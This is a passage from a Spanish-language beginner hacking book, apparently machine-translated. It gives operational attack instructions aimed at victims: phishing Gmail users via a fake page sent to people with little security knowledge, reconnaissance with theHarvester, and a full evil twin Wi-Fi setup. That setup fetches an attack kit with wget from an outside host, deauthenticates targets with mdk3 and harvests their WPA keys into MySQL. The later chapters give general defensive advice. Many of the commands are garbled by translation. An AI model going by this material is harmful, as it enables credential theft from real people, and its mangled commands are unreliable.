Wapka no está disponible en India. El gobierno de ese país actualmente está bloqueando todos los sitios relacionados

con Wapka.

Puede utilizar los servicios de proxy para evitar las limitaciones mencionadas anteriormente. Debe alentar a los usuarios de Gmail

a acceder a su cuenta de correo electrónico a través de su página web falsa. Aquí hay algunas técnicas que puede usar:
Acorte la dirección web de su sitio de phishing a través de www.tinyurl.com . Envíe la URL a
personas con poco conocimiento sobre seguridad digital.

Utiliza tácticas de ingeniería social para atraer a más víctimas.


Cómo recopilar información usando Kali Linux

Como aprendió en capítulos anteriores, la recopilación de información es un aspecto importante de las pruebas de

piratería y penetración. Sus posibilidades de éxito aumentarán significativamente si tiene muchos datos sobre su

objetivo. En esta parte del libro, aprenderá a usar Kali Linux para recopilar información.

TheHarvester - Los fundamentos

Kali Linux tiene una extensa colección de herramientas de "reconocimiento". Para mantener esta sección corta, centrémonos en una

herramienta llamada "TheHarvester". TheHarvester es una herramienta basada en Python que puede recopilar información importante en su

nombre. Puede tomar nombres de usuario, direcciones de correo electrónico, nombres de host y subdominios de varias fuentes.

El proceso
Acceda a su computadora Kali Linux y abra una terminal. Luego, escriba "theharvester" para iniciar la herramienta de

reconocimiento. TheHarvester viene como una herramienta incorporada para las últimas versiones de Kali, por lo que

probablemente no necesite descargar nada. Sin embargo, si su computadora no tiene este programa, puede visitar https://github.com

para descargarlo

Estos son los pasos que debe seguir:

1. Use la siguiente sintaxis:

theHarvester –d [www.sampleurl.com] –l 300 –b [nombre del motor de búsqueda]

Aquí hay un ejemplo:

theHarvester –d facebook.com –l 300 –b bing

2. Solo reemplace www.sampleurl.com con la URL de su sitio web de destino. Entonces,

indique el motor de búsqueda que desea usar. El resultado que obtendrá depende de la información

que pueda obtener el motor de búsqueda. Si desea obtener toda la información disponible sobre su

objetivo, escriba "todos" al final del código


en lugar. Por ejemplo:

theHarvester –d facebook.com –l 300 –b todos

3. Los resultados de la búsqueda aparecerán en el terminal. Si desea guardar la información, puede agregar "-f" al

comando y especificar un nombre de archivo. Aquí hay un ejemplo:

theHarvester –d facebook.com –l 300 –b bing –f muestra

El archivo resultante está en formato HTML.


Cómo configurar un AP Evil Twin

Los Evil Twin AP (es decir, los puntos de acceso) son puntos de acceso manipulados que pretenden ser puntos de acceso WiFi.

Cuando una persona se conecta a un Evil Twin AP, su información estará expuesta al hacker.

Para la víctima, el punto de acceso malicioso es un punto de acceso que tiene una gran señal. Esta percepción resulta del hecho de

que el hacker está cerca de la víctima. La gente ama las redes WiFi fuertes, por lo que es probable que una víctima se conecte a un

Evil Twin AP.

El proceso
1. Acceda a su computadora Kali.

2. Asegúrese de tener conexión a internet.


3. Inicie una terminal e ingrese

apt-get install dhcp3-server

Este comando instalará un servidor DHCP en su máquina.

4. Escriba

nano / etc / dhcpd.conf

Y presiona Enter. Su terminal mostrará un archivo vacío.

5. Escriba los siguientes comandos:

autoritario

tiempo de arrendamiento

predeterminado 600 tiempo de arrendamiento máximo 6000

subred 192.168.1.128 máscara de red 255.255.255.128 {opción

subnet-mask 255.255.255.128 opción broadcast-address

192.168.1.255
enrutadores de opción 192.168.1.129 servidor de

nombres de dominio de opción 8.8.8.8 rango

192.168.1.130 192.168.1.140}

6. Una vez hecho esto, use la combinación de teclas CTRL + X y presione “Y”.

7. Cambie a otro directorio escribiendo:

cd / var / www

8. Luego, emita los siguientes comandos:

rm index.html

wget http://hackthistv.com/eviltwin.zip descomprimir

eviltwin.zip rm eviltwin.zip

9. Dispare MySQL y el servidor Apache escribiendo:

/etc/init.d/mysql start

/etc/init./apache2 start

10) Utilizará MySQL para generar una base de datos para almacenar WPA / WPA2

contraseñas Aquí hay comandos que debe emitir:

Mysql –u raíz

crear base de datos evil_twin; use

evil_twin

crear cuento wpa_keys (passwors varchar (64), confirmar varchar (64));

11) Tipo " ruta ip "Para determinar su dirección IP local.


12) Identifique el nombre de su adaptador de red con este comando:

airmon-ng start wlan0

13) Actualice el OUI (Identificador Organizacionalmente Único) de su

Programa Airodump-ng. Aquí está el comando:

airodump-ng-oui-update

14) Encuentre el ESSID (Identificación de conjunto de servicio extendido), BSSID (el

Dirección MAC de su punto de acceso) y el canal que necesita usar. El comando que debes usar
es:

airodump-ng –M mon0

15. Active el Evil Twin AP usando esta sintaxis:

airbase-ng –e [inserte el ESSID aquí] –c [inserte el número del canal aquí] –P mon0

dieciséis. El programa Airbase-ng creó una interfaz de túnel en su nombre. Solo tiene que configurar

esta interfaz de túnel para conectar su interfaz cableada y su punto de acceso "malvado". Para hacer esto,

debe iniciar una terminal y escribir lo siguiente:

ifconfig [nombre de la interfaz del túnel] 192.168.1.129 máscara de red 255.255.255.128

17) Habilite el reenvío de protocolo de Internet a través de estos comandos:

route add –net 192.168.1.128 netmask 255.255.255.128 gw 192.186.1.129 echo 1> / proc / sys /

net / ipv4 / ip_forward

iptables –table net –append POSTROUTING –out-interface [nombre de la interfaz local] –j MASKQUERADE

iptables –append FORWARD –in-interface [nombre de la interfaz del túnel] –j ACEPTAR iptables –t net –A

PREROUTING –p tcp –dport 80 –j DNET –to-destination [DIRECCIÓN LOCALIP: 80]


iptables –t net –A POSTROUTING –j MASQUERADE

dhcpd –cf /etc./dhcpd.conf –pf /var/run/dhcpd.pid [nombre de la interfaz del túnel]

etc./init.d/isc-dhcp-server start

18) Desconecte sus objetivos de sus redes inalámbricas actuales. A

Para lograr esto, debe generar un archivo de "lista negra" para contener el BSSID del objetivo. Emita los siguientes

comandos:

echo [BSSID]> lista negra

mdk3 mon0 d –b lista negra –c [CH. #]

19) Mire la terminal que contiene su programa Airbase-ng. Vea si un objetivo conectado a su

punto de acceso. Cuando una persona intenta conectarse, verá una página de seguridad que solicita la clave

WPA / WPA2.

20) Verifique el terminal para su base de datos MySQL e ingrese lo siguiente:

use evil_twin

21) Acceda a "wpa_keys" para ver los datos ingresados ​por su objetivo.
Capítulo 7: Cómo protegerse

Hoy, innumerables hackers están sueltos. Estas personas están propagando virus informáticos a través de Internet. Si no

tiene cuidado, los programas maliciosos pueden infectar su máquina. En este capítulo, aprenderá cómo protegerse de las

técnicas y vectores habituales que utilizan los piratas informáticos.


Prevenir los vectores de ataque típicos

Los hackers usan los siguientes vectores para atraer a las víctimas:

Estafas

Es tu día de suerte. Alguien de Nigeria necesita su ayuda para contrabandear dinero de su país. No tienes que

hacer nada difícil. Solo tiene que realizar algunas transferencias electrónicas y esperar a que el nigeriano le

entregue su parte de los fondos.

Mientras revisaba la bandeja de entrada de su cuenta de correo electrónico, vio un mensaje que decía que ganó un concurso. Solo

tiene que enviar algo de dinero para el envío y esperar a que llegue su premio. Las situaciones indicadas anteriormente son

estafas típicas. Probablemente pienses que nadie se enamoraría de ellos. Bueno, nada podría estar más lejos de la verdad. Miles

de personas caen en tales trucos. Las víctimas envían dinero y / o información confidencial a los piratas informáticos, esperando

un beneficio rápido.

Piensa antes de reaccionar a cualquier correo electrónico. Las estafas funcionan mejor contra las personas que actúan rápidamente. Si un

correo electrónico dice algo que es demasiado bueno para ser verdad, ignórelo. Si el mensaje le pide que brinde información personal,

informe el correo electrónico y etiquételo como spam.

Caballos de Troya

Un caballo de Troya sirve como contenedor para programas maliciosos. Este "contenedor" a menudo aparece como un archivo

interesante o importante. Una vez que descargue un caballo de Troya, su contenido infectará su computadora. Esta técnica es

extremadamente efectiva para convertir a usuarios inocentes en víctimas desafortunadas.

En la mayoría de los casos, los hackers usan correos electrónicos para enviar troyanos. Envían un correo electrónico de phishing que

contiene un troyano como archivo adjunto. El correo electrónico lo alentará a descargar y abrir el archivo incluido.

Sin embargo, algunos piratas informáticos utilizan sitios de redes sociales para distribuir troyanos. Publican videos con

títulos interesantes. Una vez que haga clic en el video, la página web le indicará que debe actualizar su navegador primero

si desea ver el contenido. Bueno, la "actualización" que necesita descargar e instalar es un troyano.

La mejor manera de luchar contra este vector de piratería es utilizando su sentido común y ejecutando un
programa antivirus actualizado.

Descargas automáticas
En algunas situaciones, incluso los programas de seguridad actualizados no son suficientes. Su computadora puede

tener uno o más programas vulnerables que los hackers pueden aprovechar. Por ejemplo, si tiene una versión anterior de

una aplicación informática, puede ser vulnerable a los virus.

Los hackers explotan las vulnerabilidades presentes en un programa estableciendo un sitio web manipulado. Estas personas atraen a

las víctimas enviando mensajes de phishing a través de correos electrónicos o sitios de redes sociales.

Tenga en cuenta, sin embargo, que los piratas informáticos no se limitan a sus propios sitios. Pueden atacar un sitio legítimo e

insertar códigos maliciosos en él. Una vez que visite un sitio comprometido, los códigos insertados analizarán su máquina en

busca de programas vulnerables. Luego, los códigos instalarán virus en su máquina automáticamente.

Puede protegerse manteniendo actualizadas las aplicaciones de su computadora. Los desarrolladores de software lanzan

actualizaciones y / o parches para sus productos. La mayoría de los programas pueden detectar cada vez que hay una nueva

actualización disponible. Simplemente le preguntarán si desea o no actualizar su programa. Presiona "Sí" y espera a que se

complete el proceso de actualización.

Explotación de contraseñas débiles

Las historias ficticias muestran a los piratas informáticos como personas que pueden adivinar las contraseñas con facilidad. Los

hackers del mundo real, sin embargo, rara vez usan este método. Ni siquiera se molestan en adivinar las contraseñas de sus

víctimas. Utilizan varios métodos para obtener esa información crucial. Puede mejorar su seguridad en línea utilizando

diferentes contraseñas para diferentes sitios. Por ejemplo, la contraseña de su cuenta de Facebook debe ser diferente de la de

su cuenta de Twitter. De esta manera, su cuenta de Twitter seguirá estando segura incluso si un hacker ataca con éxito su

perfil de Facebook, y viceversa.

Usar la misma contraseña para todas sus cuentas es extremadamente riesgoso. Cuando una de sus cuentas se ve

comprometida, el resto de sus cuentas también estarán en peligro. No tiene que usar contraseñas completamente

diferentes. Es suficiente agregar algunos caracteres a su contraseña principal para crear diferentes variaciones.
Un hacker también podría intentar responder a sus preguntas de seguridad. Puede proteger su cuenta dando una respuesta que no

esté relacionada con la pregunta. De esta manera, el hacker no podrá acceder a su cuenta, independientemente de cuán

diligentemente haya realizado su investigación.

Aprovechando el WiFi abierto


El término "WiFi abierto" se refiere a una red inalámbrica sin ningún tipo de encriptación. Eso significa que

cualquiera puede conectarse a la red e interactuar con las máquinas dentro de ella. Cuando un hacker ingresa a

su red, podrá ver y grabar todas las cosas que hace. También puede visitar sitios web restringidos y / o descargar

archivos ilegalmente a través de su conexión a Internet. Cuando ese hacker hace algo ilegal y es rastreado, la

policía lo visitará.

Es importante establecer una contraseña para su red WiFi. Asegúrese de que el cifrado de su red esté configurado en

WPA / WPA-2. Este cifrado implica hashing, lo que hace que piratear sea una tarea extremadamente difícil.
Cómo proteger su sitio web de los piratas informáticos

Hay muchas razones por las cuales un hacker atacaría el sitio web de una empresa. Por ejemplo, un pirata informático podría

intentar robar su información financiera para fines personales. También podría intentar obtener datos relacionados con el

negocio y venderlos a sus competidores. Debido a esto, debe hacer todo lo posible para proteger su sitio de hackers

maliciosos.

Ataques de piratería típicos


Inyección SQL: con este ataque, un hacker puede falsificar su identidad, acceder a la base de datos de su sitio

y destruir / modificar la información dentro de su base de datos. Aquí, el hacker insertará códigos SQL

maliciosos en los campos de formulario de su sitio web. DDoS (Denegación de servicio distribuida): el objetivo

de este ataque es derribar un sitio web temporalmente. Si un ataque DDoS tiene éxito, los usuarios legítimos

no podrán usar el sitio web. Los hackers lo realizan inundando el objetivo con solicitudes continuas.

CSRF (falsificación de solicitud de sitios cruzados): aquí, el pirata informático secuestrará una sesión para realizar compras en

nombre de la víctima. Este ataque ocurre cuando la víctima hace clic en una URL o descarga un archivo que ejecuta acciones

desconocidas y / o no deseadas. XSS (Cross-Site Scripting): los piratas informáticos utilizan esta técnica para destruir su sitio

web y / o ejecutar sus cargas útiles. Básicamente, un ataque XSS ocurre cuando un pirata informático inyecta códigos

maliciosos o cargas útiles en un programa que se ejecuta en el extremo del usuario.

Las medidas defensivas


Para proteger su sitio web de ataques maliciosos, debe:

Solicite a programadores expertos que revisen los códigos en su sitio web. Ejecute escáneres de

código.

Ofrezca recompensas a las personas que detectarán errores existentes en su sitio. Asegúrese de que su sitio

tenga WAF (Firewall de aplicaciones web). Este tipo de firewall supervisa su sistema y evita posibles ataques.

Implemente CAPTCHA o solicite a los visitantes del sitio web que respondan una pregunta. De esta manera, puede asegurarse

de que cada solicitud provenga de un humano.


Cómo mantener su negocio seguro

Aquí hay algunos consejos prácticos que puede usar para proteger su negocio:

No almacene información irrelevante del cliente: su sitio web será un objetivo sabroso para los piratas

informáticos si contiene información diversa relacionada con el cliente. Si desea proteger su negocio, no

guarde información que no va a utilizar. Por ejemplo, abstenerse de almacenar la información de la tarjeta de

crédito de sus clientes si no la necesita para su negocio.

La piratería es una actividad difícil. Los hackers no te atacarán si tu sitio web no tiene nada digno de robo.

Almacenar información del cliente es conveniente. Sin embargo, los riesgos involucrados aquí superan los

beneficios.

Asegúrese de tener la tecnología adecuada: los hackers confían en herramientas modernas y

vulnerabilidades recientemente descubiertas. Su empresa no podrá sobrevivir a un ataque de piratería si se

basa en tecnología obsoleta. Sería mejor si implementara una autenticación de dos factores antes de dar

acceso a información confidencial. Eduque a su gente: la defensa de su red es tan poderosa como su

empleado más débil. Tenga en cuenta que los hackers pueden usar tácticas de ingeniería social. Si uno de

sus empleados cae en tales trucos, la seguridad de su negocio estará en peligro. Su firewall y los códigos de

sitios web perfectos no importarán si sus empleados son imprudentes cuando manejan sus contraseñas.

En estos días, la seguridad digital es el trabajo de todos. Eduque a sus empleados sobre la importancia de la

vigilancia y el cuidado, especialmente al manejar información confidencial. Además, capacite a su gente sobre

cómo identificar tácticas de ingeniería social.


Conclusión

Espero que este libro haya podido ayudarte a aprender los conceptos básicos de piratería.

El siguiente paso es practicar sus habilidades de piratería y programación de forma regular. La tecnología

informática evoluciona a un ritmo deslumbrante. Debes seguir estudiando las últimas técnicas de piratería.

También debes mantener tu arsenal actualizado. Cada vez más hackers comparten sus herramientas con

otros. Si quieres convertirte en un exitoso hacker y probador de penetración, tu colección de herramientas

debe tener los programas más nuevos y más fuertes. La programación es un aspecto importante de la

piratería. Obtendrá una gran mejora en sus habilidades de piratería si sabe cómo usar varios lenguajes de

computadora. El tercer capítulo de este libro explica los conceptos básicos de Python. Lea ese material varias

veces para que pueda comprender la sintaxis del lenguaje Python. Es cierto que Python es uno de los

lenguajes más simples que existen. Sin embargo,

También es importante practicar tus habilidades de piratería. Descargue diferentes sistemas operativos y ejecútelos como

máquinas virtuales. Luego, atacarlos usando Kali Linux.

Al aprender a programar y mantenerse actualizado con las últimas técnicas de piratería, se convertirá en un

hacker experimentado en poco tiempo.

Finalmente, si te encantó leer este libro, no dudes en dejar un comentario en Amazon


- cada elogio o comentario constructivo cuenta. ¡Gracias

nuevamente por descargar este libro!

También podría gustarte